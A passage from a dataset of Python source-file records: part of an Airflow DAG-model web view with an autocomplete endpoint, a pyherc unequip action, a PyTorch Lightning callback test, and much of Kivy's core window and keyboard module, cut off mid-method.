redirect(self.get_redirect())\n\n\nclass DagModelView(AirflowModelView):\n route_base = '/dagmodel'\n\n datamodel = AirflowModelView.CustomSQLAInterface(models.DagModel)\n\n base_permissions = ['can_list', 
'can_show']\n\n list_columns = ['dag_id', 'is_paused', 'last_scheduler_run',\n 'last_expired', 'scheduler_lock', 'fileloc', 'owners']\n\n formatters_columns = {\n 'dag_id': wwwutils.dag_link\n }\n\n base_filters = [['dag_id', DagFilter, lambda: []]]\n\n def get_query(self):\n \"\"\"\n Default filters for model\n \"\"\"\n return (\n super().get_query()\n .filter(or_(models.DagModel.is_active,\n models.DagModel.is_paused))\n .filter(~models.DagModel.is_subdag)\n )\n\n def get_count_query(self):\n \"\"\"\n Default filters for model\n \"\"\"\n return (\n super().get_count_query()\n .filter(models.DagModel.is_active)\n .filter(~models.DagModel.is_subdag)\n )\n\n @has_access\n @permission_name(\"list\")\n @provide_session\n @expose('/autocomplete')\n def autocomplete(self, session=None):\n query = unquote(request.args.get('query', ''))\n\n if not query:\n wwwutils.json_response([])\n\n # Provide suggestions of dag_ids and owners\n dag_ids_query = session.query(DagModel.dag_id.label('item')).filter(\n ~DagModel.is_subdag, DagModel.is_active,\n DagModel.dag_id.ilike('%' + query + '%'))\n\n owners_query = session.query(func.distinct(DagModel.owners).label('item')).filter(\n ~DagModel.is_subdag, DagModel.is_active,\n DagModel.owners.ilike('%' + query + '%'))\n\n # Hide DAGs if not showing status: \"all\"\n status = flask_session.get(FILTER_STATUS_COOKIE)\n if status == 'active':\n dag_ids_query = dag_ids_query.filter(~DagModel.is_paused)\n owners_query = owners_query.filter(~DagModel.is_paused)\n elif status == 'paused':\n dag_ids_query = dag_ids_query.filter(DagModel.is_paused)\n owners_query = owners_query.filter(DagModel.is_paused)\n\n filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()\n if 'all_dags' not in filter_dag_ids:\n dag_ids_query = dag_ids_query.filter(DagModel.dag_id.in_(filter_dag_ids))\n owners_query = owners_query.filter(DagModel.dag_id.in_(filter_dag_ids))\n\n payload = [row[0] for row in dag_ids_query.union(owners_query).limit(10).all()]\n\n return wwwutils.json_response(payload)\n"} {"ext": "py", "sha": "1a2ec7c86582405243210f553e885066a4c90da0", "content": "# -*- coding: utf-8 -*-\n\n# Copyright (c) 2010-2017 Tuukka Turto\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\"\"\"\nModule defining classes related to inventory actions\n\"\"\"\nfrom pyherc.data import is_armour, is_weapon, is_boots\nfrom pyherc.aspects import log_debug, log_info\nfrom pyherc.events import new_unequip_event\nfrom pyherc.rules.factory import SubActionFactory\n\n\nclass UnEquipFactory(SubActionFactory):\n \"\"\"\n Factory for creating unequip actions\n\n .. versionadded:: 0.8\n \"\"\"\n @log_debug\n def __init__(self):\n \"\"\"\n Constructor for this factory\n \"\"\"\n super().__init__()\n self.sub_action = 'unequip'\n\n @log_debug\n def can_handle(self, parameters):\n \"\"\"\n Can this factory process these parameters\n\n :param parameters: parameters to check\n :returns: True if factory is capable of handling parameters\n :rtype: Boolean\n \"\"\"\n return self.sub_action == parameters.sub_action\n\n @log_info\n def get_action(self, parameters):\n \"\"\"\n Create an unequip action\n\n :param parameters: parameters used to control creation\n :type parameters: InventoryParameters\n \"\"\"\n return UnEquipAction(parameters.character, parameters.item)\n\n\nclass UnEquipAction():\n \"\"\"\n Action for unequiping an item\n\n .. versionadded:: 0.8\n \"\"\"\n @log_debug\n def __init__(self, character, item):\n \"\"\"\n Default constructor\n\n :param character: character wearing the item\n :type character: Character\n :param item: item to unequip\n :type item: Item\n \"\"\"\n super().__init__()\n\n self.character = character\n self.item = item\n\n @log_info\n def execute(self):\n \"\"\"\n Executes this action\n \"\"\"\n if is_armour(self.item):\n self.character.inventory.armour = None\n self.character.raise_event(new_unequip_event(self.character,\n self.item))\n if is_weapon(self.item):\n self.character.inventory.weapon = None\n self.character.raise_event(new_unequip_event(self.character,\n self.item))\n\n if is_boots(self.item):\n self.character.inventory.boots = None\n self.character.raise_event(new_unequip_event(self.character,\n self.item))\n\n @log_debug\n def is_legal(self):\n \"\"\"\n Check if the action is possible to perform\n\n :returns: True if move is possible, false otherwise\n :rtype: Boolean\n \"\"\"\n return True\n"} {"ext": "py", "sha": "1a2ecae7b94c0b648c258f3ae55cf4ff0371822d", "content": "# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport pytest\n\nfrom pytorch_lightning import Callback, Trainer\nfrom tests.helpers.boring_model import BoringModel\n\n\n@pytest.mark.parametrize(\"single_cb\", [False, True])\ndef test_train_step_no_return(tmpdir, single_cb: bool):\n \"\"\"\n Tests that only training_step can be used\n \"\"\"\n\n class CB(Callback):\n def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n assert \"loss\" 
in outputs\n\n def on_validation_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n assert \"x\" in outputs\n\n def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n assert \"x\" in outputs\n\n class TestModel(BoringModel):\n def on_train_batch_end(self, outputs, batch, batch_idx: int, dataloader_idx: int) -> None:\n assert \"loss\" in outputs\n\n def on_validation_batch_end(self, outputs, batch, batch_idx: int, dataloader_idx: int) -> None:\n assert \"x\" in outputs\n\n def on_test_batch_end(self, outputs, batch, batch_idx: int, dataloader_idx: int) -> None:\n assert \"x\" in outputs\n\n def training_epoch_end(self, outputs) -> None:\n assert len(outputs) == self.trainer.num_training_batches\n\n model = TestModel()\n\n trainer = Trainer(\n callbacks=CB() if single_cb else [CB()],\n default_root_dir=tmpdir,\n limit_train_batches=2,\n limit_val_batches=2,\n max_epochs=1,\n log_every_n_steps=1,\n weights_summary=None,\n )\n\n assert any(isinstance(c, CB) for c in trainer.callbacks)\n\n trainer.fit(model)\n\n\ndef test_free_memory_on_eval_outputs(tmpdir):\n class CB(Callback):\n def on_epoch_end(self, trainer, pl_module):\n assert len(trainer._evaluation_loop.outputs) == 0\n\n model = BoringModel()\n\n trainer = Trainer(\n callbacks=CB(),\n default_root_dir=tmpdir,\n limit_train_batches=2,\n limit_val_batches=2,\n max_epochs=1,\n weights_summary=None,\n )\n\n trainer.fit(model)\n"} {"ext": "py", "sha": "1a2ecb255b4155ad265b3f3067fad5454f01a1b3", "content": "# pylint: disable=W0611\n# coding: utf-8\n'''\nWindow\n======\n\nCore class for creating the default Kivy window. Kivy supports only one window\nper application: please don't try to create more than one.\n'''\n\n__all__ = ('Keyboard', 'WindowBase', 'Window')\n\nfrom os.path import join, exists\nfrom os import getcwd\n\nfrom kivy.core import core_select_lib\nfrom kivy.clock import Clock\nfrom kivy.config import Config\nfrom kivy.logger import Logger\nfrom kivy.base import EventLoop, stopTouchApp\nfrom kivy.modules import Modules\nfrom kivy.event import EventDispatcher\nfrom kivy.properties import ListProperty, ObjectProperty, AliasProperty, \\\n NumericProperty, OptionProperty, StringProperty, BooleanProperty\nfrom kivy.utils import platform, reify\nfrom kivy.context import get_current_context\nfrom kivy.uix.behaviors import FocusBehavior\nfrom kivy.setupconfig import USE_SDL2\nfrom kivy.graphics.transformation import Matrix\n\n# late import\nVKeyboard = None\nandroid = None\n\n\nclass Keyboard(EventDispatcher):\n '''Keyboard interface that is returned by\n :meth:`WindowBase.request_keyboard`. When you request a keyboard,\n you'll get an instance of this class. Whatever the keyboard input is\n (system or virtual keyboard), you'll receive events through this\n instance.\n\n :Events:\n `on_key_down`: keycode, text, modifiers\n Fired when a new key is pressed down\n `on_key_up`: keycode\n Fired when a key is released (up)\n\n Here is an example of how to request a Keyboard in accordance with the\n current configuration:\n\n .. include:: ../../examples/widgets/keyboardlistener.py\n :literal:\n\n '''\n\n # Keycodes mapping, between str <-> int. These keycodes are\n # currently taken from pygame.key. 
But when a new provider will be\n # used, it must do the translation to these keycodes too.\n keycodes = {\n # specials keys\n 'backspace': 8, 'tab': 9, 'enter': 13, 'rshift': 303, 'shift': 304,\n 'alt': 308, 'rctrl': 306, 'lctrl': 305,\n 'super': 309, 'alt-gr': 307, 'compose': 311, 'pipe': 310,\n 'capslock': 301, 'escape': 27, 'spacebar': 32, 'pageup': 280,\n 'pagedown': 281, 'end': 279, 'home': 278, 'left': 276, 'up':\n 273, 'right': 275, 'down': 274, 'insert': 277, 'delete': 127,\n 'numlock': 300, 'print': 144, 'screenlock': 145, 'pause': 19,\n\n # a-z keys\n 'a': 97, 'b': 98, 'c': 99, 'd': 100, 'e': 101, 'f': 102, 'g': 103,\n 'h': 104, 'i': 105, 'j': 106, 'k': 107, 'l': 108, 'm': 109, 'n': 110,\n 'o': 111, 'p': 112, 'q': 113, 'r': 114, 's': 115, 't': 116, 'u': 117,\n 'v': 118, 'w': 119, 'x': 120, 'y': 121, 'z': 122,\n\n # 0-9 keys\n '0': 48, '1': 49, '2': 50, '3': 51, '4': 52,\n '5': 53, '6': 54, '7': 55, '8': 56, '9': 57,\n\n # numpad\n 'numpad0': 256, 'numpad1': 257, 'numpad2': 258, 'numpad3': 259,\n 'numpad4': 260, 'numpad5': 261, 'numpad6': 262, 'numpad7': 263,\n 'numpad8': 264, 'numpad9': 265, 'numpaddecimal': 266,\n 'numpaddivide': 267, 'numpadmul': 268, 'numpadsubstract': 269,\n 'numpadadd': 270, 'numpadenter': 271,\n\n # F1-15\n 'f1': 282, 'f2': 283, 'f3': 284, 'f4': 285, 'f5': 286, 'f6': 287,\n 'f7': 288, 'f8': 289, 'f9': 290, 'f10': 291, 'f11': 292, 'f12': 293,\n 'f13': 294, 'f14': 295, 'f15': 296,\n\n # other keys\n '(': 40, ')': 41,\n '[': 91, ']': 93,\n '{': 123, '}': 125,\n ':': 59, ';': 59,\n '=': 61, '+': 43,\n '-': 45, '_': 95,\n '/': 47, '*': 42,\n '?': 47,\n '`': 96, '~': 126,\n '´': 180, '¦': 166,\n '\\\\': 92, '|': 124,\n '\"': 34, \"'\": 39,\n ',': 44, '.': 46,\n '<': 60, '>': 62,\n '@': 64, '!': 33,\n '#': 35, '$': 36,\n '%': 37, '^': 94,\n '&': 38, '¬': 172,\n '¨': 168, '…': 8230,\n 'ù': 249, 'à': 224,\n 'é': 233, 'è': 232,\n }\n\n __events__ = ('on_key_down', 'on_key_up', 'on_textinput')\n\n def __init__(self, **kwargs):\n super(Keyboard, self).__init__()\n\n #: Window which the keyboard is attached too\n self.window = kwargs.get('window', None)\n\n #: Callback that will be called when the keyboard is released\n self.callback = kwargs.get('callback', None)\n\n #: Target that have requested the keyboard\n self.target = kwargs.get('target', None)\n\n #: VKeyboard widget, if allowed by the configuration\n self.widget = kwargs.get('widget', None)\n\n def on_key_down(self, keycode, text, modifiers):\n pass\n\n def on_key_up(self, keycode):\n pass\n\n def on_textinput(self, text):\n pass\n\n def release(self):\n '''Call this method to release the current keyboard.\n This will ensure that the keyboard is no longer attached to your\n callback.'''\n if self.window:\n self.window.release_keyboard(self.target)\n\n def _on_window_textinput(self, instance, text):\n return self.dispatch('on_textinput', text)\n\n def _on_window_key_down(self, instance, keycode, scancode, text,\n modifiers):\n keycode = (keycode, self.keycode_to_string(keycode))\n if text == '\\x04':\n Window.trigger_keyboard_height()\n return\n return self.dispatch('on_key_down', keycode, text, modifiers)\n\n def _on_window_key_up(self, instance, keycode, *largs):\n keycode = (keycode, self.keycode_to_string(keycode))\n return self.dispatch('on_key_up', keycode)\n\n def _on_vkeyboard_key_down(self, instance, keycode, text, modifiers):\n if keycode is None:\n keycode = text.lower()\n keycode = (self.string_to_keycode(keycode), keycode)\n return self.dispatch('on_key_down', keycode, text, modifiers)\n\n def 
_on_vkeyboard_key_up(self, instance, keycode, text, modifiers):\n if keycode is None:\n keycode = text\n keycode = (self.string_to_keycode(keycode), keycode)\n return self.dispatch('on_key_up', keycode)\n\n def _on_vkeyboard_textinput(self, instance, text):\n return self.dispatch('on_textinput', text)\n\n def string_to_keycode(self, value):\n '''Convert a string to a keycode number according to the\n :attr:`Keyboard.keycodes`. If the value is not found in the\n keycodes, it will return -1.\n '''\n return Keyboard.keycodes.get(value, -1)\n\n def keycode_to_string(self, value):\n '''Convert a keycode number to a string according to the\n :attr:`Keyboard.keycodes`. If the value is not found in the\n keycodes, it will return ''.\n '''\n keycodes = list(Keyboard.keycodes.values())\n if value in keycodes:\n return list(Keyboard.keycodes.keys())[keycodes.index(value)]\n return ''\n\n\nclass WindowBase(EventDispatcher):\n '''WindowBase is an abstract window widget for any window implementation.\n\n :Parameters:\n `borderless`: str, one of ('0', '1')\n Set the window border state. Check the\n :mod:`~kivy.config` documentation for a\n more detailed explanation on the values.\n `fullscreen`: str, one of ('0', '1', 'auto', 'fake')\n Make the window fullscreen. Check the\n :mod:`~kivy.config` documentation for a\n more detailed explanation on the values.\n `width`: int\n Width of the window.\n `height`: int\n Height of the window.\n\n :Events:\n `on_motion`: etype, motionevent\n Fired when a new :class:`~kivy.input.motionevent.MotionEvent` is\n dispatched\n `on_touch_down`:\n Fired when a new touch event is initiated.\n `on_touch_move`:\n Fired when an existing touch event changes location.\n `on_touch_up`:\n Fired when an existing touch event is terminated.\n `on_draw`:\n Fired when the :class:`Window` is being drawn.\n `on_flip`:\n Fired when the :class:`Window` GL surface is being flipped.\n `on_rotate`: rotation\n Fired when the :class:`Window` is being rotated.\n `on_close`:\n Fired when the :class:`Window` is closed.\n `on_request_close`:\n Fired when the event loop wants to close the window, or if the\n escape key is pressed and `exit_on_escape` is `True`. If a function\n bound to this event returns `True`, the window will not be closed.\n If the the event is triggered because of the keyboard escape key,\n the keyword argument `source` is dispatched along with a value of\n `keyboard` to the bound functions.\n\n .. versionadded:: 1.9.0\n\n `on_keyboard`: key, scancode, codepoint, modifier\n Fired when the keyboard is used for input.\n\n .. versionchanged:: 1.3.0\n The *unicode* parameter has been deprecated in favor of\n codepoint, and will be removed completely in future versions.\n\n `on_key_down`: key, scancode, codepoint\n Fired when a key pressed.\n\n .. versionchanged:: 1.3.0\n The *unicode* parameter has been deprecated in favor of\n codepoint, and will be removed completely in future versions.\n\n `on_key_up`: key, scancode, codepoint\n Fired when a key is released.\n\n .. 
versionchanged:: 1.3.0\n The *unicode* parameter has be deprecated in favor of\n codepoint, and will be removed completely in future versions.\n\n `on_dropfile`: str\n Fired when a file is dropped on the application.\n\n '''\n\n __instance = None\n __initialized = False\n _fake_fullscreen = False\n _density = 1\n\n # private properties\n _size = ListProperty([0, 0])\n _modifiers = ListProperty([])\n _rotation = NumericProperty(0)\n _clearcolor = ObjectProperty([0, 0, 0, 1])\n\n children = ListProperty([])\n '''List of the children of this window.\n\n :attr:`children` is a :class:`~kivy.properties.ListProperty` instance and\n defaults to an empty list.\n\n Use :meth:`add_widget` and :meth:`remove_widget` to manipulate the list of\n children. Don't manipulate the list directly unless you know what you are\n doing.\n '''\n\n parent = ObjectProperty(None, allownone=True)\n '''Parent of this window.\n\n :attr:`parent` is a :class:`~kivy.properties.ObjectProperty` instance and\n defaults to None. When created, the parent is set to the window itself.\n You must take care of it if you are doing a recursive check.\n '''\n\n icon = StringProperty()\n\n def _get_modifiers(self):\n return self._modifiers\n\n modifiers = AliasProperty(_get_modifiers, None)\n '''List of keyboard modifiers currently active.\n '''\n\n def _get_size(self):\n r = self._rotation\n w, h = self._size\n if self._density != 1:\n w, h = self._win._get_gl_size()\n if self.softinput_mode == 'resize':\n h -= self.keyboard_height\n if r in (0, 180):\n return w, h\n return h, w\n\n def _set_size(self, size):\n if self._size != size:\n r = self._rotation\n if r in (0, 180):\n self._size = size\n else:\n self._size = size[1], size[0]\n\n self.dispatch('on_resize', *size)\n return True\n else:\n return False\n\n size = AliasProperty(_get_size, _set_size, bind=('_size', ))\n '''Get the rotated size of the window. If :attr:`rotation` is set, then the\n size will change to reflect the rotation.\n '''\n\n def _get_clearcolor(self):\n return self._clearcolor\n\n def _set_clearcolor(self, value):\n if value is not None:\n if type(value) not in (list, tuple):\n raise Exception('Clearcolor must be a list or tuple')\n if len(value) != 4:\n raise Exception('Clearcolor must contain 4 values')\n self._clearcolor = value\n\n clearcolor = AliasProperty(_get_clearcolor, _set_clearcolor,\n bind=('_clearcolor', ))\n '''Color used to clear the window.\n\n ::\n\n from kivy.core.window import Window\n\n # red background color\n Window.clearcolor = (1, 0, 0, 1)\n\n # don't clear background at all\n Window.clearcolor = None\n\n .. 
versionchanged:: 1.7.2\n The clearcolor default value is now: (0, 0, 0, 1).\n\n '''\n\n # make some property read-only\n def _get_width(self):\n _size = self._size\n if self._density != 1:\n _size = self._win._get_gl_size()\n r = self._rotation\n if r == 0 or r == 180:\n return _size[0]\n return _size[1]\n\n width = AliasProperty(_get_width, None, bind=('_rotation', '_size'))\n '''Rotated window width.\n\n :attr:`width` is a read-only :class:`~kivy.properties.AliasProperty`.\n '''\n\n def _get_height(self):\n '''Rotated window height'''\n r = self._rotation\n _size = self._size\n if self._density != 1:\n _size = self._win._get_gl_size()\n kb = self.keyboard_height if self.softinput_mode == 'resize' else 0\n if r == 0 or r == 180:\n return _size[1] - kb\n return _size[0] - kb\n\n height = AliasProperty(_get_height, None, bind=('_rotation', '_size'))\n '''Rotated window height.\n\n :attr:`height` is a read-only :class:`~kivy.properties.AliasProperty`.\n '''\n\n def _get_center(self):\n return self.width / 2., self.height / 2.\n\n center = AliasProperty(_get_center, None, bind=('width', 'height'))\n '''Center of the rotated window.\n\n :attr:`center` is a :class:`~kivy.properties.AliasProperty`.\n '''\n\n def _get_rotation(self):\n return self._rotation\n\n def _set_rotation(self, x):\n x = int(x % 360)\n if x == self._rotation:\n return\n if x not in (0, 90, 180, 270):\n raise ValueError('can rotate only 0, 90, 180, 270 degrees')\n self._rotation = x\n if self.initialized is False:\n return\n self.dispatch('on_resize', *self.size)\n self.dispatch('on_rotate', x)\n\n rotation = AliasProperty(_get_rotation, _set_rotation,\n bind=('_rotation', ))\n '''Get/set the window content rotation. Can be one of 0, 90, 180, 270\n degrees.\n '''\n\n softinput_mode = OptionProperty('', options=('', 'pan', 'scale', 'resize'))\n '''This specifies the behavior of window contents on display of soft\n keyboard on mobile platform. Can be one of '', 'pan', 'scale', 'resize'.\n\n When '' The main window is left as it is allowing the user to use\n :attr:`keyboard_height` to manage the window contents the way they want.\n\n when 'pan' The main window pans moving the bottom part of the window to be\n always on top of the keyboard.\n\n when 'resize' The window is resized and the contents scaled to fit the\n remaining space.\n\n .. versionadded:: 1.9.0\n\n :attr:`softinput_mode` is a :class:`OptionProperty` defaults to None.\n\n '''\n\n _keyboard_changed = BooleanProperty(False)\n\n def _upd_kbd_height(self, *kargs):\n self._keyboard_changed = not self._keyboard_changed\n\n def _get_ios_kheight(self):\n return 0\n\n def _get_android_kheight(self):\n global android\n if not android:\n import android\n return android.get_keyboard_height()\n\n def _get_kheight(self):\n if platform == 'android':\n return self._get_android_kheight()\n if platform == 'ios':\n return self._get_ios_kheight()\n return 0\n\n keyboard_height = AliasProperty(_get_kheight, None,\n bind=('_keyboard_changed',))\n '''Rerturns the height of the softkeyboard/IME on mobile platforms.\n Will return 0 if not on mobile platform or if IME is not active.\n\n .. 
versionadded:: 1.9.0\n\n :attr:`keyboard_height` is a read-only :class:`AliasProperty` defaults to 0.\n '''\n\n def _set_system_size(self, size):\n self._size = size\n\n def _get_system_size(self):\n if self.softinput_mode == 'resize':\n return self._size[0], self._size[1] - self.keyboard_height\n return self._size\n\n system_size = AliasProperty(\n _get_system_size,\n _set_system_size,\n bind=('_size', ))\n '''Real size of the window ignoring rotation.\n '''\n\n borderless = BooleanProperty(False)\n '''When set to True, this property removes the window border/decoration.\n\n .. versionadded:: 1.9.0\n\n :attr:`borderless` is a :class:`BooleanProperty`, defaults to False.\n '''\n\n fullscreen = OptionProperty(False, options=(True, False, 'auto', 'fake'))\n '''This property sets the fullscreen mode of the window. Available options\n are: True, False, 'auto', 'fake'. Check the :mod:`~kivy.config`\n documentation for a more detailed explanation on the values.\n\n .. versionadded:: 1.2.0\n\n .. note::\n The 'fake' option has been deprecated, use the :attr:`borderless`\n property instead.\n '''\n\n mouse_pos = ObjectProperty([0, 0])\n '''2d position of the mouse within the window.\n\n .. versionadded:: 1.2.0\n '''\n\n @property\n def __self__(self):\n return self\n\n top = NumericProperty(None, allownone=True)\n left = NumericProperty(None, allownone=True)\n position = OptionProperty('auto', options=['auto', 'custom'])\n render_context = ObjectProperty(None)\n canvas = ObjectProperty(None)\n title = StringProperty('Kivy')\n\n __events__ = (\n 'on_draw', 'on_flip', 'on_rotate', 'on_resize', 'on_close',\n 'on_motion', 'on_touch_down', 'on_touch_move', 'on_touch_up',\n 'on_mouse_down', 'on_mouse_move', 'on_mouse_up', 'on_keyboard',\n 'on_key_down', 'on_key_up', 'on_textinput', 'on_dropfile',\n 'on_request_close', 'on_joy_axis', 'on_joy_hat', 'on_joy_ball',\n 'on_joy_button_down', \"on_joy_button_up\")\n\n def __new__(cls, **kwargs):\n if cls.__instance is None:\n cls.__instance = EventDispatcher.__new__(cls)\n return cls.__instance\n\n def __init__(self, **kwargs):\n\n force = kwargs.pop('force', False)\n\n # don't init window 2 times,\n # except if force is specified\n if WindowBase.__instance is not None and not force:\n return\n\n self.initialized = False\n self._is_desktop = Config.getboolean('kivy', 'desktop')\n\n # create a trigger for update/create the window when one of window\n # property changes\n self.trigger_create_window = Clock.create_trigger(\n self.create_window, -1)\n\n # Create a trigger for updating the keyboard height\n self.trigger_keyboard_height = Clock.create_trigger(\n self._upd_kbd_height, .5)\n\n # set the default window parameter according to the configuration\n if 'borderless' not in kwargs:\n kwargs['borderless'] = Config.getboolean('graphics', 'borderless')\n if 'fullscreen' not in kwargs:\n fullscreen = Config.get('graphics', 'fullscreen')\n if fullscreen not in ('auto', 'fake'):\n fullscreen = fullscreen.lower() in ('true', '1', 'yes', 'yup')\n kwargs['fullscreen'] = fullscreen\n if 'width' not in kwargs:\n kwargs['width'] = Config.getint('graphics', 'width')\n if 'height' not in kwargs:\n kwargs['height'] = Config.getint('graphics', 'height')\n if 'rotation' not in kwargs:\n kwargs['rotation'] = Config.getint('graphics', 'rotation')\n if 'position' not in kwargs:\n kwargs['position'] = Config.getdefault('graphics', 'position',\n 'auto')\n if 'top' in kwargs:\n kwargs['position'] = 'custom'\n kwargs['top'] = kwargs['top']\n else:\n kwargs['top'] = 
Config.getint('graphics', 'top')\n if 'left' in kwargs:\n kwargs['position'] = 'custom'\n kwargs['left'] = kwargs['left']\n else:\n kwargs['left'] = Config.getint('graphics', 'left')\n kwargs['_size'] = (kwargs.pop('width'), kwargs.pop('height'))\n\n super(WindowBase, self).__init__(**kwargs)\n\n # bind all the properties that need to recreate the window\n self._bind_create_window()\n self.bind(size=self.trigger_keyboard_height,\n rotation=self.trigger_keyboard_height)\n\n self.bind(softinput_mode=lambda *dt: self.update_viewport(),\n keyboard_height=lambda *dt: self.update_viewport())\n\n # init privates\n self._system_keyboard = Keyboard(window=self)\n self._keyboards = {'system': self._system_keyboard}\n self._vkeyboard_cls = None\n\n self.children = []\n self.parent = self\n\n # before creating the window\n import kivy.core.gl # NOQA\n\n # configure the window\n self.create_window()\n\n # attach modules + listener event\n EventLoop.set_window(self)\n Modules.register_window(self)\n EventLoop.add_event_listener(self)\n\n # manage keyboard(s)\n self.configure_keyboards()\n\n # assign the default context of the widget creation\n if not hasattr(self, '_context'):\n self._context = get_current_context()\n\n # mark as initialized\n self.initialized = True\n\n def _bind_create_window(self):\n for prop in (\n 'fullscreen', 'borderless', 'position', 'top',\n 'left', '_size', 'system_size'):\n self.bind(**{prop: self.trigger_create_window})\n\n def _unbind_create_window(self):\n for prop in (\n 'fullscreen', 'borderless', 'position', 'top',\n 'left', '_size', 'system_size'):\n self.unbind(**{prop: self.trigger_create_window})\n\n def toggle_fullscreen(self):\n '''Toggle between fullscreen and windowed mode.\n\n .. deprecated:: 1.9.0\n Use :attr:`fullscreen` instead.\n '''\n pass\n\n def maximize(self):\n '''Maximizes the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: maximize() is not implemented in the current '\n 'window provider.')\n\n def minimize(self):\n '''Minimizes the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: minimize() is not implemented in the current '\n 'window provider.')\n\n def restore(self):\n '''Restores the size and position of a maximized or minimized window.\n This method should be used on desktop platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: restore() is not implemented in the current '\n 'window provider.')\n\n def hide(self):\n '''Hides the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. 
warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: hide() is not implemented in the current '\n 'window provider.')\n\n def show(self):\n '''Shows the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: show() is not implemented in the current '\n 'window provider.')\n\n def close(self):\n '''Close the window'''\n pass\n\n def create_window(self, *largs):\n '''Will create the main window and configure it.\n\n .. warning::\n This method is called automatically at runtime. If you call it, it\n will recreate a RenderContext and Canvas. This means you'll have a\n new graphics tree, and the old one will be unusable.\n\n This method exist to permit the creation of a new OpenGL context\n AFTER closing the first one. (Like using runTouchApp() and\n stopTouchApp()).\n\n This method has only been tested in a unittest environment and\n is not suitable for Applications.\n\n Again, don't use this method unless you know exactly what you are\n doing!\n '''\n # just to be sure, if the trigger is set, and if this method is\n # manually called, unset the trigger\n Clock.unschedule(self.create_window)\n\n # ensure the window creation will not be called twice\n if platform in ('android', 'ios'):\n self._unbind_create_window()\n\n if not self.initialized:\n from kivy.core.gl import init_gl\n init_gl()\n\n # create the render context and canvas, only the first time.\n from kivy.graphics import RenderContext, Canvas\n self.render_context = RenderContext()\n self.canvas = Canvas()\n self.render_context.add(self.canvas)\n\n else:\n # if we get initialized more than once, then reload opengl state\n # after the second time.\n # XXX check how it's working on embed platform.\n if platform == 'linux' or Window.__class__.__name__ == 'WindowSDL':\n # on linux, it's safe for just sending a resize.\n self.dispatch('on_resize', *self.system_size)\n\n else:\n # on other platform, window are recreated, we need to reload.\n from kivy.graphics.context import get_context\n get_context().reload()\n Clock.schedule_once(lambda x: self.canvas.ask_update(), 0)\n self.dispatch('on_resize', *self.system_size)\n\n # ensure the gl viewport is correct\n self.update_viewport()\n\n def on_flip(self):\n '''Flip between buffers (event)'''\n self.flip()\n\n def flip(self):\n '''Flip between buffers'''\n pass\n\n def _update_childsize(self, instance, value):\n self.update_childsize([instance])\n\n def add_widget(self, widget, canvas=None):\n '''Add a widget to a window'''\n widget.parent = self\n self.children.insert(0, widget)\n canvas = self.canvas.before if canvas == 'before' else \\\n self.canvas.after if canvas == 'after' else self.canvas\n canvas.add(widget.canvas)\n self.update_childsize([widget])\n widget.bind(\n pos_hint=self._update_childsize,\n size_hint=self._update_childsize,\n size=self._update_childsize,\n pos=self._update_childsize)\n\n def remove_widget(self, widget):\n '''Remove a widget from a window\n '''\n if not widget in self.children:\n return\n self.children.remove(widget)\n if widget.canvas in self.canvas.children:\n self.canvas.remove(widget.canvas)\n elif widget.canvas in self.canvas.after.children:\n 
